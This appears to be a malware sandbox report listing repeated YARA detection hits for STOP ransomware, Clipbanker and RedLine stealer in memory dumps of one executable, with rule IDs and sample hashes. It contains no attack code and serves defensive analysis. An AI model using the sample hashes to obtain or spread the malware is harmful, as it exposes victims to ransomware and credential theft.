Source: 10.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2793160665.0000000000A80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.2042770332.00000000009BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1863423923.0000000004261000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001E.00000002.3443741375.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2212389849.0000000000960000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000020.00000002.4018244019.00000000008C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1939543424.000000000081D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1863815336.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2097220953.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000017.00000002.2096966521.000000000449B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1724605864.00000000043FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.1692193244.000000000459C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000003.00000002.1714774399.000000000443C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000007.00000002.1803095933.0000000001CAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
